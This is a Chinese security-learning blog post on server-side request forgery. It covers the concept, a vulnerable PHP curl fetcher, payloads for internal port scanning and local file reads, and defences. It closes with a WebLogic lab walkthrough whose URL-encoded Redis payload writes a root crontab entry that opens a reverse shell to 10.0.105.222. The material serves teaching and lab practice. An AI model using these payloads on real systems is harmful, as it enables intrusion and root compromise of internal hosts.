【CyberSecurityLearning 64】SSRF

最新推荐文章于 2024-07-11 00:40:10 发布
最新推荐文章于 2024-07-11 00:40:10 发布
阅读量271 收藏
点赞数 1
分类专栏: CyberSecurityLearning
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/115600669
版权

目录

SSRF

SSRF 概述及危害

*SSRF 概述

*SSRF 危害

SSRF 常见代码实现

SSRF 利用

*访问正常文件

*端口扫描(扫描内网机器的端口)

*读取系统本地文件

* 内网Web 应用指纹识别

*攻击内网应用

SSRF 漏洞的挖掘

SSRF 的防御

@ 限制协议

@ 限制IP

@ 限制端口

@ 过滤返回信息

@ 统一错误信息

实验:我们如何利用ssrf去攻击内网应用获得shell

Weblogic 从ssrf 到getshell

 

SSRF

SSRF 概述及危害

*SSRF 概述

互联网上的很多Web 应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,Web 应用可以获取图片、文件资源(下载或读取)。如百度识图等

用户可以从本地或者URL 的方式获取图片资源,交给百度识图处理。如果提交的是URL 地址,该应用就会通过URL 的方式获取图片资源。如果Web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端服务器返回的信息没有进行合适的验证或者过滤,就可能存在“请求伪造”的缺陷。请求伪造,顾名思义就是攻击者伪造正常的请求,以达到攻击的目的,是常见的Web 安全漏洞之一。如果“请求伪造”发生在服务器端,那么这个漏洞就叫做“服务器端请求伪造”,英文名为Server-Side Request Forgery,简称SSRF。

SSRF(服务器端请求伪造)是一种攻击者发起的伪造由服务器端发出请求的一种攻击,也是常见的Web 安全漏洞(缺陷或者风险)之一。

CSRF是发生在客户端的漏洞,它属于跨站请求伪造,这个请求伪造就是强制客户发送一个攻击者的请求
SSRF是发生在服务器端的漏洞,是强制服务器发送一个攻击者的请求

*SSRF 危害

@ 端口扫描

@ 内网Web 应用指纹识别

@ 攻击内网Web 应用

@ 读取本地文件

 

SSRF 常见代码实现

在服务器端实现通过URL 从服务器(外部或者内部)获取资源功能的方法有很多,此处使用PHP 语言和curl 扩展实现该功能。

通过phpinfo() 函数查看对curl 扩展的支持,现在大部分wamp 套件均支持curl 扩展

<?php 
if (isset($_REQUEST['url']))
{
    $link = $_REQUEST['url'];
    $filename = './curled/'.time().'.txt';
    $curlobj = curl_init($link);
    $fp = fopen($filename,"w");
    curl_setopt($curlobj, CURLOPT_FILE, $fp);
    curl_setopt($curlobj, CURLOPT_HEADER, 0);
    curl_setopt($curlobj, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_exec($curlobj);
    curl_close($curlobj);
    fclose($fp);
    $fp = fopen($filename,"r");
    $result = fread($fp, filesize($filename)); 
    fclose($fp);
    echo $result;
}else{
    echo "?url=[url]";
}
?>

    将以上代码保存成文件[ssrf_curl.php]。该段代码实现了从服务器获取资源的基本功能,提交
    [?url=http://www.baidu.com ]
    页面就会载入百度首页的资源。
 
    同时,获取的资源文件会保存在[./curled]中,并以发起请求时间的unix 时间戳命名。
 

SSRF 利用

*访问正常文件

访问正常文件,提交参数[?url=http://www.baidu.com/robots.txt]

*端口扫描(扫描内网机器的端口)

当访问未开放端口,脚本会显示空白或者报错,提交参数[?url=dict://127.0.0.1:1234]

当访问开放端口时,脚本会显示bannner 信息。

[?url=dict://127.0.0.1:80]

[?url=dict://127.0.0.1:3306]

dict://叫字典协议

用nmap进行扫描的时候是访问不到内网机器的,但是我们用ssrf就能访问内网,因为服务器就在内网,因为我们这个请求就是从服务器发出的

*读取系统本地文件

利用file协议可以任意读取本地系统文件,提交参数

[?url=file://c:\windows\system32\drivers\etc\hosts]

* 内网Web 应用指纹识别

    识别内网应用使用的框架,平台,模块以及cms可以为后续的渗透测试提供很多帮助。大多数web应用框架都有一些独特的文件和目录。通过这些文件可以识别出应用的类型,甚至详细的版本。根据这些信息就可以针对性的搜集漏洞进行攻击。
    比如可以通过访问下列文件来判断phpMyAdmin是否安装以及详细版本。
    [?url=http://localhost/phpmyadmin/README]


 

*攻击内网应用

内网安全通常都很薄弱,溢出、弱口令等一般都是存在的。通过ssrf 攻击,可以实现对内网的访问,从而可以攻击内网应用或者本地机器,获得shell,这里的应用包括服务、Web 应用

仅仅通过get 方法可以攻击的Web 应用有很多,比如structs2 命令执行等。

Weblogic 从ssrf 到redis 未授权访问到getshell
redis 数据库
未授权访问        不需要用户名和密码就可以访问数据库,读写文件,root 权限

SSRF 漏洞的挖掘

对外发起网络请求的地方都可能存在SSRF 漏洞,列举图片加载下载,分享页面,在线翻译,未公开的api(从远程服务器请求资源文件处理,编码处理,属性信息处理等。)

SSRF 的防御

@ 限制协议

仅允许http和https请求。

@ 限制IP

避免应用被用来获取内网数据,攻击内网。

@ 限制端口

限制请求的端口为http 常用的端口,例如80 443 8080 8090

@ 过滤返回信息

验证远程服务器对请求的响应是比较简单的方法。

@ 统一错误信息

避免用户可以根据错误信息来判断远端服务器的端口状态(比如只要出现错误,给用户看的就是404)

ssrf这个漏洞总结一下:
就是说如果web应用有可以从本地获取url,同时服务器会发送这个url
这种类似的功能,如果没有做一个比较好的限制,就会出现ssrf漏洞

 

实验:我们如何利用ssrf去攻击内网应用获得shell

Weblogic 从ssrf 到getshell

环境搭建:

https://vulhub.org/#/environments/weblogic/ssrf/

依赖于docker 技术

docker-compose up -d 启动两个docker 镜像

docker ps

docker exec -it 3963de188db5 "/bin/bash"

linux

crontab   计划任务

备份

访问weblogic

http://ip:7001

出现以下页面,搭建成功

漏洞存在地方:

[http://192.168.1.129:7001/uddiexplorer/]

这里我们使用Bp 抓一下包

我们发现当我们提交不同的url 页面的回显是不一样的。

当我提交以下两个不同的url,对其得到的回应,作比较

http://localhost

http://localhost:7001

确认存在SSRF漏洞

------------

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: 192.168.1.129:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
DNT: 1
Connection: close
Referer: http://192.168.1.129:7001/uddiexplorer/SearchPublicRegistries.jsp
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=dsQKp3ZLK3XNjv9JqvJ16L1nN89QZ3DK7yDLGcDgSlFwGHF5FRJQ!899981451
Upgrade-Insecure-Requests: 1

operator=http://172.18.0.2:6379&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

-------------------------------

redis 数据库

未授权访问  

在访问数据库是不需要提供用户名和密码

具有root权限

读写文件

语法

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.0.105.222/777 0>&1\n\n\n\n"   将bash弹到172.18.0.1的777端口

config set dir /etc/    设置目录
config set dbfilename crontab
save

本机监听一下777端口:ncat -lvvp 777

读写计划任务文件crontab

进行URL编码

   ----
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.105.222%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
----

  ----
http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.105.222%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
----

        读写计划任务文件crontab
        反弹Shell 到指定地址

成功反弹,拿到root用户权限

Wαff1ε
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全之SSRF
甲方乙方
08-16 5305
0x00【概述】 SSRF(Server-Side Request Forgery):服务器端请求伪造,是一种由攻击者构造形成由服务器发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 成因:大都是由于服务器端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。比如从指定的URL地址获取网页文本内容,加载指定的地址的图片,下载等。
SSRF漏洞
安全脑
07-02 748
漏洞介绍 服务端请求伪造攻击(Server-side Request Forgery)简称SSRF,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统),当WEB应用提供了从其他服务器获取数据的功能,但没有远程服务器地址和远程服务器返回的信息进行合理的验证和过滤,就可能存在SSRF,致使可以利用发起网络请求的服务来攻击其他服务。 SSRF与CSRF的区别 CSRF是服
SSRF漏洞深入利用与防御方案绕过技巧
最新发布
道阻且长,行则将至。
07-11 831
本文借助 CTFHub 与 portswigger 两个 SSRF 靶场,实践练习了 SSRF 漏洞的基础利用(内网访问、文件读取、端口探测)和进阶利用(Gopher 协议发送 post 请求、攻击 Redis 实现 RCE 等),最后实践了常见的防御方案绕过手段(黑白名单绕过、重定向、DNS 绑定等)。
SSRF攻击实例解析
Zeker62的博客
08-16 1131
普通版SSRF: 普通版版本的SSRF没有经过任何过滤 直接在请求的API中输入: http://localhost/admin 比如: stockApi=http://localhost/admin Here, the server will fetch(获取) the contents(内容) of the /admin URL and return it to the user. SSRF攻击后端系统: SSRF攻击是操纵了服务器的权限,服务器存储于后端系统 我们可以用爆破的方法,爆破后端系统的I
kkFileView SSRF
qq 117791303
04-01 410
kkFileView SSRF漏洞
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1275
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
SSRF漏洞实战
yuan_boss的博客
09-04 1548
服务器根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。
SSRF
jpygx123的博客
10-11 963
SSRF 服务器端伪造请求,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统,正式因为它是由服务端发起的,所以它能够请求到与他相连而与外网隔离的内部系统。 SSRF形成的原因大都由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、下载等等。 html、ph...
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2740
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过间延迟的判断方法,攻击者能够探测内网中的某些...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
CyberSecurityLearning 附】渗透测试技术选择题 + 法律法规
热门推荐
_Co1a
04-16 1万+
1、RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 2、Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 3、使用nmap进行ping扫描使用的参数() A. -sP B. -p C. -p0 D. -A 4、nmap的-sV是什么操作() A. TCP全连接扫描 B. FIN扫描 C. 版本扫描 D. 全面扫描 5、在HTTP 状态码中表示重定向的是() A. 200 B. 302 C. 403 D.
CyberSecurityLearning 21】防火墙
_Co1a
02-23 3219
目录 防火墙 防火墙的基本概念 防火墙的基本功能 防火墙产品及厂家 区域隔离 防火墙的分类 防火墙的发展历史 ▪包过滤防火墙 ▪应用网关/应用代理防火墙 ▪状态检测防火墙 (主流) ▪DPI防火墙(Deep Packet Inspection) 衡量防火墙性能的5大指标 防火墙的典型应用 1、标准应用 ——透明模式 2、标准应用 ——路由模式 /NAT模式 3、标准应用 ——混杂模式 4、高级应用—双机热备 防火墙策略分析-最安全的防火墙架构 实验 防火墙 防火墙的
CyberSecurityLearning 69】反序列化漏洞
_Co1a
04-17 2985
目录 反序列化 为什么要序列化 PHP 中序列化与反序列化 *简单的例子 *序列化Demo *漏洞何在? @ 创建一个类,一个对象并将其序列化和反序列化 @ 反序列化注入 *为什么这样呢 反序列化 为什么要序列化 百度百科关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单地说,序列化就是把一个对象变成可以传输的字符串,可以以特定.
【内网安全】域横向内网漫游Socks代理隧道技术
_Co1a
09-21 2751
代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这候两个内网实现通信就必须要经过代理才能实现,常见工具有frp、ngrok和ew等,ew(earthworm已经停止更新了,就不演示)),和一些防火墙的拦截 隧道主要是一些安全设备和流量监控设备上的拦截问题 代理主要解决的是三种问题:内网主机有外网,内网有过滤有一些防火墙问题、内网里面无外网 必要基础知识点: 1.内外网简单知识 内网ip地址是私有ip地址(10/8, 172.16/1...
SSRF漏洞利用全解析:典型手法与实战案例
SSRF(Server-Side Request Forgery)漏洞是一种常见的Web应用程序安全问题,它允许攻击者通过服务器端代码间接执行外部网络请求,从而访问、控制或窃取系统资源。本篇文章以一种类似于SQL注入技巧总结的形式,全面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值